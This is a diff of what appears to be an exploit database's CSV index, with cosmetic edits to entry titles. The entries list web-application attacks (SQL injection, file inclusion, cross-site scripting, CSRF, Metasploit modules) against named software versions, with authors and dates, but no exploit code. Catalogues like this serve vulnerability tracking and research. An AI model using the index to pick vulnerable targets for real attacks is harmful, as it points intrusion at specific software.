15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 -15896,platforms/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 +15896,platforms/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusions",2011-01-03,n0n0x,php,webapps,0 15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Cross-Site Request Forgery (Change Admin Password)",2011-01-04,pentesters.ir,php,webapps,0 -15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusion",2011-01-05,n0n0x,php,webapps,0 +15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusions",2011-01-05,n0n0x,php,webapps,0 15913,platforms/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 @@ -25165,7 +25166,7 @@ id,file,description,date,author,platform,type,port 16019,platforms/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",2011-01-20,R3d-D3V!L,php,webapps,0 16027,platforms/php/webapps/16027.txt,"phpCMS 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps,0 16028,platforms/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0 -16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Parameter Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0 +16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0 16037,platforms/php/webapps/16037.html,"PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)",2011-01-23,AtT4CKxT3rR0r1ST,php,webapps,0 16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 16044,platforms/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -25214,7 +25215,7 @@ id,file,description,date,author,platform,type,port 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps,0 16144,platforms/php/webapps/16144.txt,"WordPress Plugin Enable Media Replace - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - Login Parameter Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 -16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0 +16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Scripting",2011-02-14,_84kur10_,php,webapps,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps,0 16154,platforms/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 @@ -25301,7 +25302,7 @@ id,file,description,date,author,platform,type,port 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,php,webapps,0 16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5/1.2.8 - Cache Corruption Exploit (Metasploit)",2011-01-14,Metasploit,php,webapps,0 -16904,platforms/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Parameter Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0 +16904,platforms/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0 16906,platforms/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0 @@ -25390,7 +25391,7 @@ id,file,description,date,author,platform,type,port 17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - 'index.php' SQL Injection",2011-04-03,keracker,php,webapps,0 17106,platforms/php/webapps/17106.txt,"Rash CMS - SQL Injection",2011-04-03,keracker,php,webapps,0 17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,php,webapps,0 -17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion",2011-04-03,KedAns-Dz,php,webapps,0 +17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusions",2011-04-03,KedAns-Dz,php,webapps,0 17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection",2011-06-22,"Number 7",php,webapps,0 17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",multiple,webapps,0 @@ -25524,7 +25525,7 @@ id,file,description,date,author,platform,type,port 17411,platforms/php/webapps/17411.txt,"Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0 17412,platforms/php/webapps/17412.txt,"Joomla! Component com_team - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 -17414,platforms/php/webapps/17414.txt,"Joomla! Component com_calcbuilder - 'id' Parameter Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0 +17414,platforms/php/webapps/17414.txt,"Joomla! Component com_calcbuilder - 'id' Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0 17418,platforms/php/webapps/17418.rb,"IF-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 17423,platforms/php/webapps/17423.txt,"WordPress Plugin WPtouch 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0 @@ -25631,7 +25632,7 @@ id,file,description,date,author,platform,type,port 17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17680,platforms/php/webapps/17680.txt,"WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17681,platforms/php/webapps/17681.txt,"WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Parameter Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 +17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 @@ -25845,7 +25846,7 @@ id,file,description,date,author,platform,type,port 18090,platforms/php/webapps/18090.txt,"LabStoRe 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18091,platforms/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 -18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' Parameter Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 +18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"COMTREND CT-5624 Router - Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0 @@ -25888,9 +25889,9 @@ id,file,description,date,author,platform,type,port 18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,php,webapps,0 18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (Messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 -18230,platforms/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 +18230,platforms/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 18231,platforms/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 -18232,platforms/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 +18232,platforms/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,php,webapps,0 @@ -25968,7 +25969,7 @@ id,file,description,date,author,platform,type,port 18405,platforms/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18407,platforms/php/webapps/18407.txt,"WordPress Plugin AllWebMenus < 1.1.9 Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"MiniCMS 1.0/2.0 - PHP Code Injection",2012-01-22,Or4nG.M4N,php,webapps,0 -18699,platforms/php/webapps/18699.txt,"Plume CMS 1.2.4 - Multiple Persistent Cross-Site Scripting",2012-04-04,"Ivano Binetti",php,webapps,0 +18699,platforms/php/webapps/18699.txt,"Plume CMS 1.2.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-04-04,"Ivano Binetti",php,webapps,0 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,php,webapps,0 18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 @@ -25991,7 +25992,7 @@ id,file,description,date,author,platform,type,port 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail - Cross-Site Scripting",2012-01-13,"Sajjad Pourali",asp,webapps,0 18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 18452,platforms/multiple/webapps/18452.txt,"Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 -18455,platforms/php/webapps/18455.txt,"osCommerce 3.0.2 - Persistent Cross-Site",2012-02-02,Vulnerability-Lab,php,webapps,0 +18455,platforms/php/webapps/18455.txt,"osCommerce 3.0.2 - Persistent Cross-Site Scripting",2012-02-02,Vulnerability-Lab,php,webapps,0 18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 18464,platforms/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - 'base_qry_main.php t_view' SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 @@ -26081,7 +26082,7 @@ id,file,description,date,author,platform,type,port 18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",php,webapps,0 18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - 'ajax.php' Remote Command Execution",2012-03-23,EgiX,php,webapps,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0 -18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 +18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusions",2012-03-24,localh0t,php,webapps,0 18676,platforms/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0 18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0 18667,platforms/php/webapps/18667.html,"Family CMS 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 @@ -26114,13 +26115,13 @@ id,file,description,date,author,platform,type,port 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 -18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 +18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST Cross-Site Request Forgery",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 18770,platforms/php/webapps/18770.txt,"vTiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,php,webapps,0 -18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p' Parameter SQL Injection",2012-04-24,G13,php,webapps,0 +18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php?p' SQL Injection",2012-04-24,G13,php,webapps,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18787,platforms/php/webapps/18787.txt,"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 @@ -26149,7 +26150,7 @@ id,file,description,date,author,platform,type,port 18840,platforms/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall - Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps,0 18841,platforms/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps,0 18842,platforms/php/webapps/18842.txt,"Genium CMS 2012/Q2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 -18843,platforms/php/webapps/18843.txt,"myre real estate mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 +18843,platforms/php/webapps/18843.txt,"Myre Real Estate Mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18844,platforms/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps,0 18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)",2012-05-09,DennSpec,php,webapps,0 @@ -26236,7 +26237,7 @@ id,file,description,date,author,platform,type,port 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - Uploadify.php Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,php,webapps,0 19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0 -19132,platforms/php/webapps/19132.txt,"myre real estate mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 +19132,platforms/php/webapps/19132.txt,"Myre Real Estate Mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19133,platforms/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19134,platforms/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 @@ -26308,15 +26309,15 @@ id,file,description,date,author,platform,type,port 19864,platforms/php/webapps/19864.txt,"VamCart CMS 0.9 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard CMS 2.1.4 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 -20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php symb' Parameter Cross-Site Scripting",2012-07-21,muts,php,webapps,0 +20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting",2012-07-21,muts,php,webapps,0 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps,0 -19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' Parameter SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 +19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 20011,platforms/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary '.PHP' File Upload (Metasploit)",2012-07-23,Metasploit,php,webapps,0 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php' q Parameter SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 -20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php id' Parameter Blind SQL Injection",2012-07-23,muts,linux,webapps,0 +20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 @@ -26325,7 +26326,7 @@ id,file,description,date,author,platform,type,port 20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0 -20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid' Parameter Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 +20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php?groupid' Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",windows,webapps,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps,0 20166,platforms/php/webapps/20166.txt,"Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection",2012-08-01,"Patrick de Brouwer",php,webapps,0 @@ -26348,7 +26349,7 @@ id,file,description,date,author,platform,type,port 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0 20345,platforms/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps,0 -20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",php,webapps,0 +20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",php,webapps,0 20348,platforms/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 @@ -26398,7 +26399,7 @@ id,file,description,date,author,platform,type,port 20575,platforms/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps,0 20576,platforms/php/webapps/20576.txt,"Inferno vBShout 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps,0 20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting",2012-08-17,"Shai rod",php,webapps,0 -20579,platforms/php/webapps/20579.py,"T-dah Webmail Client - Multiple Persistent Cross-Site Scripting",2012-08-17,"Shai rod",php,webapps,0 +20579,platforms/php/webapps/20579.py,"T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-17,"Shai rod",php,webapps,0 20580,platforms/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 - admin.php3 Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0 20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 - violation.php3 Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0 @@ -26416,7 +26417,7 @@ id,file,description,date,author,platform,type,port 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection (Metasploit)",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 -20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php id' Parameter SQL Injection",2012-08-20,DaOne,php,webapps,0 +20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php?id' SQL Injection",2012-08-20,DaOne,php,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary '.PHP' File Upload (Metasploit)",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 @@ -26438,7 +26439,7 @@ id,file,description,date,author,platform,type,port 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 -20859,platforms/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' Parameter SQL Injection",2012-08-27,JIKO,php,webapps,0 +20859,platforms/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' SQL Injection",2012-08-27,JIKO,php,webapps,0 20862,platforms/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0 @@ -26460,13 +26461,13 @@ id,file,description,date,author,platform,type,port 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 -21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id' Parameter Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 +21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition 